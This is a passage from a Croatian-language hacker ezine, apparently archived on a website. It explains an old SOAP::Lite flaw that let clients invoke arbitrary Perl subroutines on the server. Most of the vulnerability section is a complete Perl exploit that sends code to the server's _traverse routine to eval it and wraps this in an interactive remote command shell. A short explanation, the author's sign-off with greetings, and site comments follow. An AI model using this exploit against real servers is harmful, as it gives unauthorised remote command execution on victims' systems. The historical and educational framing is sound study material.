kako nista tako ni ove stvari nisu savrsene pa su se tokom godina malo jasnije 
poceli isticati neki problemi... josh pred neko vrijeme je objavljen propust 
u SOAP::Lite modulu.. o cemu se ovdje radilo?: 

bug je zapravo dozvoljavao svakom SOAP::Lite klijentu da poziva Perl  
subrutine kao klase/objekte metode na strani SOAP::Lite servera.. 
premda je propust pokrpan u verzijama koje su uslijedile jako je zanimljiv.. 

--------[code]--------  

#!/usr/bin/perl -w 

# Copyright (c) 2002 by Ilya Martynov. All rights reserved. 

use strict; 

use SOAP::Lite; 
use Term::ReadLine; 

my($uri, $proxy) = @ARGV; 
unless(defined $proxy) { 
    die "Usage: $0 URI PROXY\n"; 
} 

my $soap = connect_soap($uri, $proxy); 
shell($soap); 

# returns soap object 
sub connect_soap { 
    my $uri = shift; 
    my $proxy = shift; 

    my $soap = SOAP::Lite 
    -> uri($uri) 
    -> proxy($proxy); 

    return $soap; 
} 

# evals any Perl code on side of SOAP::Lite based server 
sub remote_eval { 
    my $soap = shift; 
    my $expr = shift; 

    # escape Perl expression 
    $expr = escape_single_quoted($expr); 

    # code to run on side of SOAP::Lite server 
    my $code = <<CODE; 
{ 
    # make sure exploit works in tainted mode 
    local \%ENV = \%ENV; 
    (\$ENV{PATH}) = \$ENV{PATH} =~ /(.*)/; 
    delete \@ENV{qw(IFS CDPATH ENV BASH_ENV)}; 

    # evaluate Perl code 
    my \$ret = eval '$expr'; 
    # catch errors 
    if(\$\@) { \$ret = \$\@ } 
    # put result into array which will be returned to SOAP client 
    \$pointer->[0] = \$ret; 
} 
1 
CODE 

    my @params = ([], $code, '[1]'); 

    my $som = $soap->call('X:SOAP::SOM::_traverse' => @params); 

    return $som->result->[0]; 
} 

# simple pseudo shell which allows to execute commands on side of 
# SOAP::Lite based server 
sub shell { 
    my $soap = shift; 

    my $term = new Term::ReadLine 'SOAP::Lite remote shell'; 
    my $OUT = $term->OUT || \*STDOUT; 

    while (defined (my $cmd = $term->readline('> ')) ) { 
        chomp $cmd; 
        my $cmd = escape_single_quoted($cmd); 
        print $OUT remote_eval($soap, "qx'$cmd'"); 
        $term->addhistory($cmd) if $cmd =~ /\S/; 
    } 
} 

# escapes string which is going to be used as single quoted string 
sub escape_single_quoted { 
    my $string = shift; 

    $string =~ s/(['\\])/\\$1/g; 

    return $string; 
} 

-------[/code]--------  
  
stoga vidite kako ovo zapravo radi.. znaci u tim verzijama bilo je moguce  
pozivati unutar Perl paketa SOAP:Lite servera tocnije onda kad je bio 
ukljucen 'autodispatch'.. paket X:SOAP::SOM sadrzi subroutine _traverse.. 
kao sto vidite bitan je "eval".. poziv za 'eval'.. posto je moguce pozvati 
ovo direktno mozemo zaobici odredjene stvari..  

od pojave ovog propusta stvari za soap su krenule losim tokom.. kroz  
verzije nailazilo se na niz novih propusta.. kako manjih sitnica tako i  
vecih odnosno bitnijih pogresaka.. 

listu vecine bugova mozete pogledati na: 

http://sourceforge.net/tracker/?group_id=66000&atid=513017 

 
  
/////////////////////////////////////////////////////////////////////////// 
-----> 0x08 Exploding echoes 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

 

       Evo nas .. polako ali sigurno dosli smo do kraja. Ovdje je masu stvari 
izostavljena iz mnogo razloga (mislio ja jos tu pisat o LED-u i SOED-u ali  
ponovno razmislih pa sam hvala Bogu odustao i ostao ziv, barem josh koji dan)  
:) dosta je nedorecenih stvari, no to je jednostavno i nepopravljivo gotovo 
uvijek tako jer ogromne stvari tek dolaze i ostaju na vama ukoliko ste nakon  
citanja ostali zinteresirani za obradjenu i mnoge usko povezane teme. Ako je 
bilo sto nejasno, imate neku ideju, sugestiju ili kritiku u vezi s tekstom  
molim da me kontaktirate na haarp@phearless.org. Nista, to je to, ide greetz a 
vi uzivajte i dalje uceci nove, zanimljive stvari citajuci novi phearless a ja 
idem probati zaspati koji sat i ozdraviti napokon... pozdrav i do citanja :) 

    Veliki pozdrav: Shatterhand, Wintermuth(aca), Exoduks, h4z4rd, argv(ziv?) 
                    :), bl00dz3r0, BoyScout, n00ne, aljosha, modche, 'and, 
                    m4rk0, set_X, ex BlackHat, za sve na ptp-u, neke na riwiu, 
                    takodjer veliki pozdrav za skrobota (nestao), SiKeta,  
                    furiu, leecha i veeeeeeejika pusa mojoj sljatkoj majoj.. 

 

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

guest's profile picture
@guest
28 Apr 2024
Hey, Are you seeking a top-notch domain name for your business ? Perhaps this one fits the bill for you? accountingservices.shop Could yo ...
DrWatson's profile picture
@DrWatson
28 Apr 2024
What does this comment mean?
DrWatson's profile picture
@DrWatson
28 Apr 2024
I remember reading the news at that time. Are there any developments ?
Francesco's profile picture
Francesco Arca (@Francesco)
28 Apr 2024
sembra buonissima :)
guest's profile picture
@guest
28 Apr 2024
Situs Sabung Ayam Digmaan
guest's profile picture
@guest
28 Apr 2024
great job
eZine's profile picture
eZine lover (@eZine)
27 Apr 2024
you are welcome :)
eZine's profile picture
eZine lover (@eZine)
27 Apr 2024
These files were released in the 80s and 90s on BBSs, ancient ancestors of the modern internet. This file in particular dates back to Octobe ...
eZine's profile picture
eZine lover (@eZine)
27 Apr 2024
I love it too
eZine's profile picture
eZine lover (@eZine)
27 Apr 2024
Thank you. Old ezines need to be preserved
a Francesco Arca production 2016 - 2024
Terms of Service - Privacy Policy
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT